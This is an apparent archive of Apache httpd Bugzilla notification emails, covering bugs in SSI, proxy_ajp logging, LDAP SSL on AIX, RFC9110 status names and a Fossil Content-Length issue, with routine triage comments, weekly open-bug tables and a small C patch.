https://bz.apache.org/bugzilla/show_bug.cgi?id=68959 Joe Orton changed: What|Removed |Added Status|NEW |NEEDINFO --- Comment #1 from Joe Orton --- Can you reproduce this with 2.4.59? 2.4.25 is nearly 8 years old. Also, can you find a reproduction recipe without using a third-party module? I tried reproducing with an SSI page like: Start End where bigger.pl produces 64K of output, but it works fine for me with 2.4.59. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68946] Apache error logs of module "proxy_ajp" is not converting to JSON format
https://bz.apache.org/bugzilla/show_bug.cgi?id=68946 Priyanshi changed: What|Removed |Added Status|NEEDINFO|NEW -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68873] Threads with status endless "Closing Connection"
https://bz.apache.org/bugzilla/show_bug.cgi?id=68873 Benoit changed: What|Removed |Added Resolution|--- |FIXED Status|NEW |RESOLVED --- Comment #1 from Benoit --- Finally, I solved my problem on my own. The cause came from a PHP script that had an infinite loop. I figured it out after deactivating the H2 protocol, otherwise in the status I only saw "idle, stream" or "done, streams", and that didn't allow me to understand which page was blocking the server. It's a shame that this H2 protocol hides the page that is still loading. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68959] New: Issue with SSI Truncating Response for Files > 32KB after Apache httpd 2.4.25 Upgrade
https://bz.apache.org/bugzilla/show_bug.cgi?id=68959 Bug ID: 68959 Summary: Issue with SSI Truncating Response for Files > 32KB after Apache httpd 2.4.25 Upgrade Product: Apache httpd-2 Version: 2.4.25 Hardware: PC OS: Linux Status: NEW Severity: normal Priority: P2 Component: mod_include Assignee: bugs@httpd.apache.org Reporter: abhishek18g...@gmail.com Target Milestone: --- Subject: Issue with SSI Truncating Response for Files > 32KB after Apache httpd 2.4.25 Upgrade Hi, I'm currently using Server Side Includes (SSI) with Apache httpd and encountering an issue where responses are truncated for files larger than 32KB. Previously, everything was functioning correctly up to version 2.4.23. However, after upgrading to version 2.4.25, I've observed that SSI stops working as expected for files exceeding 32KB. My SSI setup involves integration with https://sling.apache.org/documentation/bundles/dynamic-includes.html: html {{code}} {{code}} In this configuration, requests are directed to my instance. Upon reviewing the changes between these versions, I suspect the issue may be related to the commit https://github.com/apache/httpd/commit/240d6e09d1f9447ba967a0f8c87cae8823d32703. To address this, I attempted to resolve the issue by creating a custom build of version 2.4.25. I made changes equivalent to those in version 2.4.23 (https://github.com/apache/httpd/blob/2.4.23/server/request.c#L1971) in the problematic section of version 2.4.25 (https://github.com/apache/httpd/blob/2.4.25/server/request.c#L1973-L1982). After applying these changes, SSI functionality for files larger than 32KB was restored. I would appreciate any assistance or insights into resolving this issue. Thank you. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68946] Apache error logs of module "proxy_ajp" is not converting to JSON format
https://bz.apache.org/bugzilla/show_bug.cgi?id=68946 --- Comment #2 from Priyanshi --- ErrorLogFormat directive is not defined in virtualhost. It is defined in httpd.conf file outside of any virtualhost container. Also all other error logs are converted into the defined format. This one particular log is only not converting to any of the format defined. [Tue Apr 16 06:06:20.902697 2024] [proxy_ajp:error] [pid 11056:tid 38644] (OS 10054)An existing connection was forcibly closed by the remote host. : AH01030: ajp_ilink_receive() can't receive header -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
Bug report for Apache httpd-2 [2024/04/28]
+---+ | Bugzilla Bug ID | | +-+ | | Status: UNC=Unconfirmed NEW=New ASS=Assigned| | | OPN=ReopenedVER=Verified(Skipped Closed/Resolved) | | | +-+ | | | Severity: BLK=Blocker CRI=Critical REG=Regression MAJ=Major | | | | MIN=Minor NOR=NormalENH=Enhancement TRV=Trivial | | | | +-+ | | | | Date Posted | | | | | +--+ | | | | | Description | | | | | | | |10747|New|Maj|2002-07-12|ftp SIZE command and 'smart' ftp servers results i| |11580|Opn|Enh|2002-08-09|generate Content-Location headers | |12033|Opn|Nor|2002-08-26|Graceful restart immediately result in [warn] long| |13661|Ass|Enh|2002-10-15|Apache cannot not handle dynamic IP reallocation | |14104|Opn|Enh|2002-10-30|not documented: must restart server to load new CR| |16811|Ass|Maj|2003-02-05|mod_autoindex always return webpages in UTF-8.| |17244|Ass|Nor|2003-02-20|./configure --help gives false information regardi| |17497|Opn|Nor|2003-02-27|mod_mime_magic generates incorrect response header| |20036|Ass|Nor|2003-05-19|Trailing Dots stripped from PATH_INFO environment | |21260|Opn|Nor|2003-07-02|CacheMaxExpire directive not enforced ! | |21533|Ass|Cri|2003-07-11|Multiple levels of htacces files can cause mod_aut| |22484|Opn|Maj|2003-08-16|semaphore problem takes httpd down| |22686|Opn|Nor|2003-08-25|ab: apr_poll: The timeout specified has expired (7| |22898|Opn|Nor|2003-09-02|nph scripts with two HTTP header | |23911|Opn|Cri|2003-10-18|CGI processes left defunct/zombie under 2.0.54| |24095|Opn|Cri|2003-10-24|ERROR "Parent: child process exited with status 32| |24437|Opn|Nor|2003-11-05|mod_auth_ldap doubly-escapes backslash (\) charact| |24890|Opn|Nor|2003-11-21|Apache config parser should not be local aware ( g| |25469|Opn|Enh|2003-12-12|create AuthRoot for defining paths to auth files | |25484|Ass|Nor|2003-12-12|Non-service Apache cannot be stopped in WinXP | |26153|Opn|Cri|2004-01-15|Apache cygwin directory traversal vulnerability | |27257|Ass|Enh|2004-02-26|rotatelogs with getopt and setuid | |27715|Ass|Enh|2004-03-16|Client sending misformed Range "bytes = 0-100" ins| |29090|Ass|Enh|2004-05-19|MultiviewsMatch NegotiatedOnly extensions not resp| |29510|Ass|Enh|2004-06-10|ab does not support multiple cookies | |29644|Ver|Nor|2004-06-17|mod_proxy keeps downloading even after the client | |30259|Ass|Enh|2004-07-22|When proxy connects to backend, a DNS lookup is do| |30505|Ass|Enh|2004-08-05|Apache uses 'Error', and not lower level event typ| |31302|Opn|Cri|2004-09-19|suexec doesn't execute commands if they're not in | |31352|Ass|Enh|2004-09-21|RFE, Bind to LDAP server with browser supplier use| |31418|Opn|Nor|2004-09-25|SSLUserName is not usable by other modules| |32328|Opn|Enh|2004-11-19|Make mod_rewrite escaping optional / expose intern| |32750|Ass|Maj|2004-12-17|mod_proxy + Win32DisableAcceptEx = memory leak| |33089|New|Nor|2005-01-13|mod_include: Options +Includes (or IncludesNoExec)| |34519|New|Enh|2005-04-19|Directory index should emit valid XHTML | |35098|Ver|Maj|2005-05-27|Install fails using --prefix | |35154|Opn|Nor|2005-06-01|Support for NID_serialNumber, etc. in SSLUserName | |35652|Opn|Min|2005-07-07|Improve error message: "pcfg_openfile: unable to c| |35768|Opn|Nor|2005-07-17|Missing file logs at far too high of log level| |36676|New|Nor|2005-09-15|time() bug in httpd/os/win32/util_win32.c:wait_for| |36710|Opn|Blk|2005-09-19|CGI output not captured | |37006|Ver|Reg|2005-10-11|"pthread" error when compiling under AIX 5.3 using| |37290|Opn|Min|2005-10-28|DirectoryIndex don't work in scriptaliased directo| |37564|New|Enh|2005-11-19|Suggestion: mod_suexec SuexecUserGroup directive i| |38325|Opn|Nor|2006-01-20|impossible to determine AUTH_TYPE of interpreted r| |38571|New|Enh|2006-02-08|CustomLog directive checked by apachectl configtes| |38995|New|Nor|2006-03-16|httpd tries to communicate with the CGI daemon eve| |39275|Opn|Nor|2006-04-11|slow child_init causes MaxClients warning | |39287|New|Nor|2006-04-12|Incorrect If-Modified-Since validation (due to syn| |39727|Ass|Nor|2006-06-05|Incorrect ETag on gzip:ed content | |39748|New|Enh|2006-06-07|Header and POST support for
[Bug 63366] POST body is empty when REQUEST is send with transfer-encoding:chunked
https://bz.apache.org/bugzilla/show_bug.cgi?id=63366 Thiago Atauri Turini changed: What|Removed |Added Component|mod_proxy_fcgi |All Version|2.4.39 |2.5-HEAD Status|NEW |RESOLVED OS|Linux |All Priority|P2 |P1 Severity|blocker |normal Resolution|--- |WONTFIX -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 62339] proxy-fcgi-pathinfo=unescape breaks PATH_INFO and SCRIPT_NAME
https://bz.apache.org/bugzilla/show_bug.cgi?id=62339 Thiago Atauri Turini changed: What|Removed |Added Severity|blocker |normal Component|mod_proxy_fcgi |All Status|NEW |RESOLVED Priority|P2 |P1 OS|Linux |All Resolution|--- |FIXED -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 66463] Socket Stuck on: proxy_fcgi:error (104)Connection reset by peer:
https://bz.apache.org/bugzilla/show_bug.cgi?id=66463 Thiago Atauri Turini changed: What|Removed |Added OS|Linux |All Component|mod_http2 |All Version|2.4.55 |2.5-HEAD Priority|P2 |P1 Hardware|PC |All Severity|critical|normal -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 56413] can not restart httpd on centos 5.10 64bit
https://bz.apache.org/bugzilla/show_bug.cgi?id=56413 Thiago Atauri Turini changed: What|Removed |Added OS|Linux |All Severity|blocker |normal Component|mod_setenvif|All Priority|P2 |P1 Resolution|--- |FIXED Version|2.4.9 |2.4-HEAD Status|NEW |RESOLVED -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68946] Apache error logs of module "proxy_ajp" is not converting to JSON format
https://bz.apache.org/bugzilla/show_bug.cgi?id=68946 Ruediger Pluem changed: What|Removed |Added Status|NEW |NEEDINFO -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68946] Apache error logs of module "proxy_ajp" is not converting to JSON format
https://bz.apache.org/bugzilla/show_bug.cgi?id=68946 Ruediger Pluem changed: What|Removed |Added OS||All --- Comment #1 from Ruediger Pluem --- Where is your ErrorLogFormat directive? In a virtualhost? For the error message you mention the ErrorLogFormat directive needs to be on server level outside a virtualhost. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68946] New: Apache error logs of module "proxy_ajp" is not converting to JSON format
https://bz.apache.org/bugzilla/show_bug.cgi?id=68946 Bug ID: 68946 Summary: Apache error logs of module "proxy_ajp" is not converting to JSON format Product: Apache httpd-2 Version: 2.4.57 Hardware: PC Status: NEW Severity: normal Priority: P2 Component: mod_proxy_ajp Assignee: bugs@httpd.apache.org Reporter: shahpriyansh...@gmail.com Target Milestone: --- We have converted our Apache error logs to JSON format by defining the format in httpd.conf file ErrorLogFormat "{"timestamp":"%{u}t", "ApacheModule": "%m", "level":"%l", "ApacheProcessId": "%P", "ApacheThreadId": "%T", "ApacheSourceFile":"%7F", "ErrorKind":"%E", "ClientIp":"%a", "ErrorMessage" : "%M"}" After defining above format all the logs are printed in JSON format despite one proxy_ajp module error [Tue Apr 16 06:06:20.902697 2024] [proxy_ajp:error] [pid 11056:tid 38644] (OS 10054)An existing connection was forcibly closed by the remote host. : AH01030: ajp_ilink_receive() can't receive header Other logs of the proxy_ajp module are also successfully converted to JSON. We have changed the format and just kept ErrorLogFormat %M . still above mentioned log is not converting to any format I believe this particular log has no effect of ErrorLogFormat defined in httpd.conf file Please help me to convert this log to JSON -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 67860] mod_tls: Fails to build with rustls_ffi 0.11.0
https://bz.apache.org/bugzilla/show_bug.cgi?id=67860 --- Comment #9 from Bernard Spil --- Thanks! Now I can try getting the mod_tls port on FreeBSD -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 67860] mod_tls: Fails to build with rustls_ffi 0.11.0
https://bz.apache.org/bugzilla/show_bug.cgi?id=67860 --- Comment #8 from Daniel --- I think this bug can be closed. Support is in-tree: https://svn.apache.org/viewvc?view=revision=1917270 -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 67860] mod_tls: Fails to build with rustls_ffi 0.11.0
https://bz.apache.org/bugzilla/show_bug.cgi?id=67860 Daniel changed: What|Removed |Added Status|NEW |RESOLVED Resolution|--- |FIXED -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 67860] mod_tls: Fails to build with rustls_ffi 0.11.0
https://bz.apache.org/bugzilla/show_bug.cgi?id=67860 --- Comment #7 from Daniel --- I've put up an initial PR updating to rustls-ffi 0.13: https://github.com/apache/httpd/pull/439 -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
Bug report for Apache httpd-2 [2024/04/21]
+---+ | Bugzilla Bug ID | | +-+ | | Status: UNC=Unconfirmed NEW=New ASS=Assigned| | | OPN=ReopenedVER=Verified(Skipped Closed/Resolved) | | | +-+ | | | Severity: BLK=Blocker CRI=Critical REG=Regression MAJ=Major | | | | MIN=Minor NOR=NormalENH=Enhancement TRV=Trivial | | | | +-+ | | | | Date Posted | | | | | +--+ | | | | | Description | | | | | | | |10747|New|Maj|2002-07-12|ftp SIZE command and 'smart' ftp servers results i| |11580|Opn|Enh|2002-08-09|generate Content-Location headers | |12033|Opn|Nor|2002-08-26|Graceful restart immediately result in [warn] long| |13661|Ass|Enh|2002-10-15|Apache cannot not handle dynamic IP reallocation | |14104|Opn|Enh|2002-10-30|not documented: must restart server to load new CR| |16811|Ass|Maj|2003-02-05|mod_autoindex always return webpages in UTF-8.| |17244|Ass|Nor|2003-02-20|./configure --help gives false information regardi| |17497|Opn|Nor|2003-02-27|mod_mime_magic generates incorrect response header| |20036|Ass|Nor|2003-05-19|Trailing Dots stripped from PATH_INFO environment | |21260|Opn|Nor|2003-07-02|CacheMaxExpire directive not enforced ! | |21533|Ass|Cri|2003-07-11|Multiple levels of htacces files can cause mod_aut| |22484|Opn|Maj|2003-08-16|semaphore problem takes httpd down| |22686|Opn|Nor|2003-08-25|ab: apr_poll: The timeout specified has expired (7| |22898|Opn|Nor|2003-09-02|nph scripts with two HTTP header | |23911|Opn|Cri|2003-10-18|CGI processes left defunct/zombie under 2.0.54| |24095|Opn|Cri|2003-10-24|ERROR "Parent: child process exited with status 32| |24437|Opn|Nor|2003-11-05|mod_auth_ldap doubly-escapes backslash (\) charact| |24890|Opn|Nor|2003-11-21|Apache config parser should not be local aware ( g| |25469|Opn|Enh|2003-12-12|create AuthRoot for defining paths to auth files | |25484|Ass|Nor|2003-12-12|Non-service Apache cannot be stopped in WinXP | |26153|Opn|Cri|2004-01-15|Apache cygwin directory traversal vulnerability | |27257|Ass|Enh|2004-02-26|rotatelogs with getopt and setuid | |27715|Ass|Enh|2004-03-16|Client sending misformed Range "bytes = 0-100" ins| |29090|Ass|Enh|2004-05-19|MultiviewsMatch NegotiatedOnly extensions not resp| |29510|Ass|Enh|2004-06-10|ab does not support multiple cookies | |29644|Ver|Nor|2004-06-17|mod_proxy keeps downloading even after the client | |30259|Ass|Enh|2004-07-22|When proxy connects to backend, a DNS lookup is do| |30505|Ass|Enh|2004-08-05|Apache uses 'Error', and not lower level event typ| |31302|Opn|Cri|2004-09-19|suexec doesn't execute commands if they're not in | |31352|Ass|Enh|2004-09-21|RFE, Bind to LDAP server with browser supplier use| |31418|Opn|Nor|2004-09-25|SSLUserName is not usable by other modules| |32328|Opn|Enh|2004-11-19|Make mod_rewrite escaping optional / expose intern| |32750|Ass|Maj|2004-12-17|mod_proxy + Win32DisableAcceptEx = memory leak| |33089|New|Nor|2005-01-13|mod_include: Options +Includes (or IncludesNoExec)| |34519|New|Enh|2005-04-19|Directory index should emit valid XHTML | |35098|Ver|Maj|2005-05-27|Install fails using --prefix | |35154|Opn|Nor|2005-06-01|Support for NID_serialNumber, etc. in SSLUserName | |35652|Opn|Min|2005-07-07|Improve error message: "pcfg_openfile: unable to c| |35768|Opn|Nor|2005-07-17|Missing file logs at far too high of log level| |36676|New|Nor|2005-09-15|time() bug in httpd/os/win32/util_win32.c:wait_for| |36710|Opn|Blk|2005-09-19|CGI output not captured | |37006|Ver|Reg|2005-10-11|"pthread" error when compiling under AIX 5.3 using| |37290|Opn|Min|2005-10-28|DirectoryIndex don't work in scriptaliased directo| |37564|New|Enh|2005-11-19|Suggestion: mod_suexec SuexecUserGroup directive i| |38325|Opn|Nor|2006-01-20|impossible to determine AUTH_TYPE of interpreted r| |38571|New|Enh|2006-02-08|CustomLog directive checked by apachectl configtes| |38995|New|Nor|2006-03-16|httpd tries to communicate with the CGI daemon eve| |39275|Opn|Nor|2006-04-11|slow child_init causes MaxClients warning | |39287|New|Nor|2006-04-12|Incorrect If-Modified-Since validation (due to syn| |39727|Ass|Nor|2006-06-05|Incorrect ETag on gzip:ed content | |39748|New|Enh|2006-06-07|Header and POST support for
[Bug 68921] New: LDAP SSL support unavailable on AIX after upgrading to 2.4.58
https://bz.apache.org/bugzilla/show_bug.cgi?id=68921 Bug ID: 68921 Summary: LDAP SSL support unavailable on AIX after upgrading to 2.4.58 Product: Apache httpd-2 Version: 2.4.58 Hardware: Other OS: AIX Status: NEW Severity: normal Priority: P2 Component: All Assignee: bugs@httpd.apache.org Reporter: mathews.den...@gmail.com Target Milestone: --- Since upgrading from httpd-2.4.56-1 to 2.4.58 LDAP SSL authentication is no longer working OS: AIX 7.1 Starting Apache httpd... [Sat Apr 20 12:00:56.295581 2024] [ldap:debug] [pid 21234020] util_ldap.c(2455): AH01303: LDAP: SSL trusted global cert - /etc/certs/XX.pem (type CA_BASE64) [Sat Apr 20 12:00:56.334296 2024] [ssl:info] [pid 21234020] AH01876: mod_ssl/2.4.58 compiled against Server: Apache/2.4.58, Library: OpenSSL/1.1.1l [Sat Apr 20 12:00:56.434091 2024] [ldap:debug] [pid 12321380] util_ldap.c(3039): AH01316: LDAP merging Shared Cache conf: shm=0x110081e18 rmm=0x110081e70 for VHOST: [Sat Apr 20 12:00:56.434150 2024] [ldap:debug] [pid 12321380] util_ldap.c(3039): AH01316: LDAP merging Shared Cache conf: shm=0x110081e18 rmm=0x110081e70 for VHOST: [Sat Apr 20 12:00:56.434169 2024] [ldap:debug] [pid 12321380] util_ldap.c(3039): AH01316: LDAP merging Shared Cache conf: shm=0x110081e18 rmm=0x110081e70 for VHOST: [Sat Apr 20 12:00:56.437123 2024] [ldap:info] [pid 12321380] AH01320: LDAP: SSL support unavailable -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68913] RHEL8: undefined symbol: apreq_handle_apache2 at /usr/lib64/perl5/DynaLoader.pm line 193.
https://bz.apache.org/bugzilla/show_bug.cgi?id=68913 --- Comment #1 from Ruediger Pluem --- This doesn't sound like an upstream problem. Please get in touch with the packager of said package instead. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68913] New: RHEL8: undefined symbol: apreq_handle_apache2 at /usr/lib64/perl5/DynaLoader.pm line 193.
https://bz.apache.org/bugzilla/show_bug.cgi?id=68913 Bug ID: 68913 Summary: RHEL8: undefined symbol: apreq_handle_apache2 at /usr/lib64/perl5/DynaLoader.pm line 193. Product: Apache httpd-2 Version: 2.4-HEAD Hardware: PC OS: Linux Status: NEW Severity: critical Priority: P2 Component: libapreq2 Assignee: bugs@httpd.apache.org Reporter: maaz.khal...@trilogy.com Target Milestone: --- This was working in RHEL7 but is not working in RHEL8. perl -MApache2::Request -e1 Can't load '/usr/lib64/perl5/vendor_perl/auto/APR/Request/Apache2/Apache2.so' for module APR::Request::Apache2: /usr/lib64/perl5/vendor_perl/auto/APR/Request/Apache2/Apache2.so: undefined symbol: apreq_handle_apache2 at /usr/lib64/perl5/DynaLoader.pm line 193. at /usr/lib64/perl5/vendor_perl/Apache2/Request.pm line 3. Compilation failed in require at /usr/lib64/perl5/vendor_perl/Apache2/Request.pm line 3. BEGIN failed--compilation aborted at /usr/lib64/perl5/vendor_perl/Apache2/Request.pm line 3. Compilation failed in require. BEGIN failed--compilation aborted. nm -D /usr/lib64/perl5/vendor_perl/auto/APR/Request/Apache2/Apache2.so U apreq_handle_apache2 nm -D /usr/lib64/httpd/modules/mod_apreq2.so 2460 T apreq_handle_apache2 Also note that perl-libapreq2 rpm in RHEL8 (epel repository) did not have a dependency of libapreq2 rpm while this dependency existed in RHEL7. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68912] Use RFC9110 HTTP status code names
https://bz.apache.org/bugzilla/show_bug.cgi?id=68912 Michiel changed: What|Removed |Added Keywords||PatchAvailable -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68912] Use RFC9110 HTTP status code names
https://bz.apache.org/bugzilla/show_bug.cgi?id=68912 --- Comment #1 from Michiel --- Created attachment 39672 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39672=edit Patch that adds RFC9110 status codes Added patch -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68912] New: Use RFC9110 HTTP status code names
https://bz.apache.org/bugzilla/show_bug.cgi?id=68912 Bug ID: 68912 Summary: Use RFC9110 HTTP status code names Product: Apache httpd-2 Version: 2.5-HEAD Hardware: PC OS: Linux Status: NEW Severity: normal Priority: P2 Component: Core Assignee: bugs@httpd.apache.org Reporter: m...@x14.nl Target Milestone: --- rfc9110 obsoletes the earlier rfc 7231. This document also includes some status codes that were previously only used for WebDAV and assigns more generic names to these status codes. This patch uses the new wording in constants and in the text returned by Apache server ref: https://www.rfc-editor.org/rfc/rfc9110.html#name-changes-from-rfc-7231 See also https://bz.apache.org/bugzilla/show_bug.cgi?id=58984 -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #17 from Yann Ylavic --- It seems that for ssh the connection is not closed finally (unless HTTP/1.0 or "connection: close"), so the safe way could be to "goto write_err;" for the new warning? Reusing a connection without knowing if there is/was a body (and thus ignoring it) looks a bit hazardous to me, but as I said I don't know how this ssh+status protocol works.. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #16 from Richard Hipp --- I think the connections are always "close". But I'm not sure. Better to safe that hit a problem later. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #15 from Yann Ylavic --- I don't how the "g.url.isSsh" + Status header protocol works but I get that if there is no content-length specified then there is also no body to expect, thus you can keep the connection alive? -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #14 from Richard Hipp --- Implemented here: <https://fossil-scm.org/home/info/f4ffefe708793b03> -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #13 from Yann Ylavic --- Maybe something more explicit like this: diff --git a/src/http.c b/src/http.c index 0460e04d1..c71fde995 100644 --- a/src/http.c +++ b/src/http.c @@ -676,6 +676,10 @@ int http_exchange( goto write_err; } } + if( iLength<0 && !closeConnection ){ +fossil_warning("\"content-length\" missing from %d keep-alive reply", rc); +goto write_err; + } if( rc!=200 ){ fossil_warning("\"location:\" missing from %d redirect reply", rc); goto write_err; -- Otherwise in https://fossil-scm.org/home/info/71919ad1b542832c it's possibly missing an "else" now? -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #12 from Richard Hipp --- That is a reasonable suggestion. Thanks. There are other considerations in play - that same routine is also used to parse raw CGI replies in the case of a sync via SSH - and so for that reason I have implemented your suggestion slightly differently, but I think the end result is the same. See the change at <https://fossil-scm.org/home/info/71919ad1b542832c>. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #11 from Yann Ylavic --- (In reply to Richard Hipp from comment #10) > https://fossil-scm.org/home/info/a8e33fb161f45b65 FWIW, I think the correct check for the "server did not reply" case is "iLength<0 && !closeConnection" rather than "iHttpVersion<0", because responses with no Content-Length nor Transfer-Encoding is allowed only for HTTP/1.1 responses plus "Connection: close" or with HTTP/1.0 responses (where "Connection: close" is implicit if not specified). An HTTP/1.1 response with no "Connection: close" defaults to keep-alive so it might not be wise to accept no C-L nor T-E for those. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #10 from Richard Hipp --- Thanks again, everybody. The problem was indeed in Fossil. Since the Fossil CGI on the server side was always sending Content-Length in the reply, it was expecting to always get a Content-Length back on the client side. It never occurred to me that the intervening web server would elide that header field. Fossil has been updated at <https://fossil-scm.org/home/info/a8e33fb161f45b65> to resolve this inadequacy. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #9 from Richard Hipp --- (In reply to Yann Ylavic from comment #7) > > I think that Fossil's HTTP protocol handling needs fixing here: > https://fossil-scm.org/home/file?ci=trunk=src/http.c=664 I agree. Thanks for taking the time to look into this. I had already implemented the patch at <https://fossil-scm.org/home/info/dfefd069b6026eff> prior to me seeing your post. The patch is on a branch. We are testing it now to see if that resolves the issue. I'll report back once I know more. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #7 from Yann Ylavic --- Created attachment 39671 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39671=edit Fix Fossil's HTTP protocol handling I think that Fossil's HTTP protocol handling needs tising here: https://fossil-scm.org/home/file?ci=trunk=src/http.c=664 Something like this patch.. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
https://bz.apache.org/bugzilla/show_bug.cgi?id=68905 --- Comment #8 from Yann Ylavic --- (sorry fat fingers => s/tising/fixing/) -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68905] CONTENT_LENGTH omitted from POST requests
